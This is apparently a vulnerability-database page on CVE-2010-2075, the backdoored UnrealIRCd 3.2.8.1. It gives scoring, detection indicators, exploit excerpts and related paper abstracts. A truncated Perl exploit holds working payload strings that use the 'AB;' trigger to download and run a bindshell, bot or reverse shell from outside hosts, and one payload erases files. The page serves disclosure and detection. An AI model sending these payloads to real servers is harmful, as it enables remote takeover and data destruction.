CVE-2010-2075
published 2010-06-15CVE-2010-2075: UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse)…
PriorityP274high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
83.53%
99.6th percentile
UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unrealircd | unrealircd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect the backdoor trigger string 'AB;' sent as the first bytes of a TCP connection to the IRC port (default 6667); any data following 'AB;' on the same line is executed as a shell command on the server. ↗
- →Monitor for IRC server processes spawning child processes (e.g., /bin/sh) or making outbound connections to port 4444, which is indicative of a reverse shell established via the backdoor. ↗
- →Alert on wget activity from /tmp by the ircd process, particularly downloading and chmod +x of files, as this matches known payload delivery chains for this backdoor. ↗
- →The backdoor is triggered via the DEBUG3_DOLOG_SYSTEM macro; look for UnrealIRCd version 3.2.8.1 in the environment as the exclusively affected version. ↗
- ·The backdoor was only present in the Unreal3.2.8.1.tar.gz distributed from certain mirror sites during a specific window; official/clean distributions of the same version number are not affected. ↗
- ·The Metasploit module requires the payload type to be one of 'generic perl ruby bash telnet'; payloads outside this set will not function with the exploit. ↗
- ·The exploit payload space is limited to 1024 bytes; commands exceeding this size will not be delivered successfully. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
exploitdb·2010-12-05
CVE-2010-2075 UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
---
##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
'Description' => %q{
This module exploits a malicious backdoor that was added to the
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11227 $'
Exploit-DB
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute
exploitdb·2010-06-13
CVE-2010-2075 UnrealIRCd 3.2.8.1 - Remote Downloader/Execute
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute
---
#!/usr/bin/perl
# Unreal3.2.8.1 Remote Downloader/Execute Trojan
# DO NOT DISTRIBUTE -PRIVATE-
# -iHaq (2l8)
use Socket;
use IO::Socket;
## Payload options
my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &';
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';
my $payload4 = 'AB; killall ircd';
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';
$host = "";
$port = "";
$type = "";
$host = @ARGV[0];
$port = @ARGV[1];
$type = @ARGV[2];
if ($host eq "") { usage(); }
if ($port eq "") { usage(
Metasploit
UnrealIRCD 3.2.8.1 Backdoor Command Execution
metasploit
UnrealIRCD 3.2.8.1 Backdoor Command Execution
UnrealIRCD 3.2.8.1 Backdoor Command Execution
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
arXiv
PenHeal: A Two-Stage LLM Framework for Automated Pentesting and Optimal Remediation
arxiv_fulltext·2024-07-25
PenHeal: A Two-Stage LLM Framework for Automated Pentesting and Optimal Remediation
PenHeal:
A Two-Stage LLM Framework for Automated Pentesting and Optimal Remediation
Junjie Huang
[email protected]
New York University Shanghai
Shanghai
China
Quanyan Zhu
[email protected]
New York University
New York
USA
Huang et al.
## Abstract
Recent advances in Large Language Models (LLMs) have shown significant potential in enhancing cybersecurity defenses against sophisticated threats. LLM-based penetration testing is an essential step in automating system security evaluations by identifying vulnerabilities. Remediation, the subsequent crucial step, addresses these discovered vulnerabilities. Since details about vulnerabilities, exploitation methods, and software versions offer crucial insights into system weaknesses, integrating penetration testing with vulnerability remedia
arXiv
Autosploit: A Fully Automated Framework for Evaluating the Exploitability of Security Vulnerabilities
arxiv_fulltext·2020-06-30
Autosploit: A Fully Automated Framework for Evaluating the Exploitability of Security Vulnerabilities
: A Fully Automated Framework for Evaluating
the Exploitability of Security Vulnerabilities
Noam Moscovich [1], Ron Bitton [1], Yakov Mallah [1], Masaki Inokuchi [2], Tomohiko Yagyu [2], Yuval Elovici [1] and Asaf Shabtai [1]
[1]Dept. of Software and Information Systems Engineering, Ben-Gurion University of the Negev
[2]NEC Corporation
## Abstract
The existence of a security vulnerability in a system does not necessarily mean that it can be exploited.
In this research, we introduce an automated framework for evaluating the exploitability of vulnerabilities.
Given a vulnerable environment and relevant exploits, will automatically test the exploits on different configurations of the environment in order to identify the specific properties necessary for successful exploitation of the exi
arXiv
AIQL: Enabling Efficient Attack Investigation from System Monitoring Data
arxiv_fulltext·2018-06-07
AIQL: Enabling Efficient Attack Investigation from System Monitoring Data
: Enabling Efficient Attack Investigation
from System Monitoring Data
Peng Gao^1
Xusheng Xiao^2
Zhichun Li^3
Kangkook Jee^3
Fengyuan Xu^4
Sanjeev R. Kulkarni^1
Prateek Mittal^1
^1Princeton University\; ^2Case Western Reserve University\; ^3NEC Laboratories America, Inc.
^4National Key Lab for Novel Software Technology, Nanjing University
^1\pgao,kulkarni,pmittal\@princeton.edu\; ^[email protected]\; ^3\zhichun,kjee\@nec-labs.com\; ^[email protected]
empty
empty
### Abstract
The need for countering Advanced Persistent Threat (APT) attacks has led to the solutions that ubiquitously monitor system activities in each host,
and perform timely attack investigation over the monitoring data for analyzing attack provenance.
However, existing query systems based on relational
http://osvdb.org/65445http://seclists.org/fulldisclosure/2010/Jun/277http://seclists.org/fulldisclosure/2010/Jun/284http://secunia.com/advisories/40169http://security.gentoo.org/glsa/glsa-201006-21.xmlhttp://www.exploit-db.com/exploits/13853http://www.openwall.com/lists/oss-security/2010/06/14/11http://www.securityfocus.com/bid/40820http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txthttp://www.vupen.com/english/advisories/2010/1437http://osvdb.org/65445http://seclists.org/fulldisclosure/2010/Jun/277http://seclists.org/fulldisclosure/2010/Jun/284http://secunia.com/advisories/40169http://security.gentoo.org/glsa/glsa-201006-21.xmlhttp://www.exploit-db.com/exploits/13853http://www.openwall.com/lists/oss-security/2010/06/14/11http://www.securityfocus.com/bid/40820http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txthttp://www.vupen.com/english/advisories/2010/1437
2010-06-15
Published